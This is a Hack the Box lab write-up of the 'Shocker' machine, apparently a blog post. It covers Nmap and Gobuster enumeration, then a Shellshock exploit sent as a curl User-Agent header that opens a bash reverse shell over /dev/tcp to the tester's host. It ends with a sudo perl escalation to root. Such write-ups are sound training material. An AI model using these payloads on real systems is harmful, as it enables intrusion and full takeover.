Write-Up: HTB Shocker

Mertle
5 min readNov 12, 2020

--

Shocker is an easy box on Hack the Box. I had a lot of fun with this box, so let’s jump in.

First off, I began enumeration with runing my mercon.py script (https://github.com/RECturtle/Mercon) which runs Nmap and then runs Smbmap and/or Gobuster depending on which open ports are found.

Looking below, there’s not too much open. Port 80 serving a webpage and port 2222 which has been configured for ssh. Gobuster also did not find much.

kali@kali:~/development/Mercon$ ./mercon.py -t shocker -i 10.10.10.56 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt 
===== Running Nmap Scan =====
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-06 12:04 EST
Nmap scan report for 10.10.10.56
Host is up (0.025s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds

[+] Gobuster Running
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2020/11/06 12:04:43 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/11/06 12:07:30 Finished
===============================================================

Since there wasn’t much there and the website provided little to not clues, it’s time to further enumerate with gobuster. For this go-around I changed the word list and added various extensions to cast a wider net. And it looks like our net caught something! Reading through the output, /cgi-bin/ stands out. Unfortunately, it’s forbidden. Time to dig deeper…

kali@kali:~/htb/shocker$ gobuster dir -x txt,php,html -u 10.10.10.56 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
2020/11/06 12:25:21 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/cgi-bin/ (Status: 403)
/cgi-bin/.html (Status: 403)
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2020/11/06 12:26:13 Finished
===============================================================

I am familiar with seeing the directory /cgi-bin/, but I don’t actually know what it’s purpose is. After googling and checking out a couple links, my hopes were raised. Looks like cgi bin hosts scripts that communicate to the server. With this knowledge, time to run another gobuster scan and see what it finds.

For this scan I included various language file extensions to attempt to capture any script files that are accessible in the directory. And… we get a hit! Time to grab user.sh and see what we can do with it.

kali@kali:~/htb/shocker$ gobuster dir -x txt,py,pl,sh,php -u 10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: py,pl,sh,php,txt
[+] Timeout: 10s
===============================================================
2020/11/06 12:34:00 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.py (Status: 403)
/.hta.pl (Status: 403)
/.hta.sh (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.py (Status: 403)
/.htaccess.pl (Status: 403)
/.htaccess.sh (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.py (Status: 403)
/.htpasswd.pl (Status: 403)
/user.sh (Status: 200)
===============================================================
2020/11/06 12:35:18 Finished
===============================================================

After grabbing the file, cat it and see what’s inside. Well, that’s not too interesting. Back to google to see what kind of exploits exist for cgi-bin scripts.

kali@kali:~/htb/shocker$ cat user.sh 
Content-Type: text/plain

Just an uptime test script

12:37:17 up 37 min, 0 users, load average: 0.03, 0.16, 0.17

Google cgi script exploits and find Shellshock and create curl request

After a quick search we are met with information about the shellshock bug (all of a sudden the box name makes sense).

Reading up on the bug, shellshock exists because of a bug where the evaluation of a function doesn’t stop when the end of the function is reached. Instead, it keeps evaluating and allows for processing of additional commands. This is a pretty high level explanation and there’s more technical details to this bug that I’ve left out, but I’ll leave that research to you if you’re interested in learning more about how this bug works.

To exploit, we need to send the basic syntax of a bash function.

() { :;};

In a normal bash function “:” would be replaced with something useful and we would assign this function to a variable, but we don’t actually want this function to do anything so those can be disregarded. For our payload, we will inject this into the User-Agent header of a HTTP request with a nice bash reverse shell tagged onto the end.

kali@kali:~/htb/shocker$ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.23/4444 0>&1' http://10.10.10.56/cgi-bin/user.sh

Setup a netcat listener, send the curl command, and boom. We have a shell as Shelly!

kali@kali:~/htb/shocker$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.56 54592
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$

First things first, sudo -l. We find that Shelly can run /usr/bin/perl as root with no password. This makes our job very easy.

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl

Quick detour to GTFO bins and root is ours!

shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
sudo perl -e 'exec "/bin/sh";'
id
uid=0(root) gid=0(root) groups=0(root)

Thanks for reading and I’ll have another blog out next week!

--

--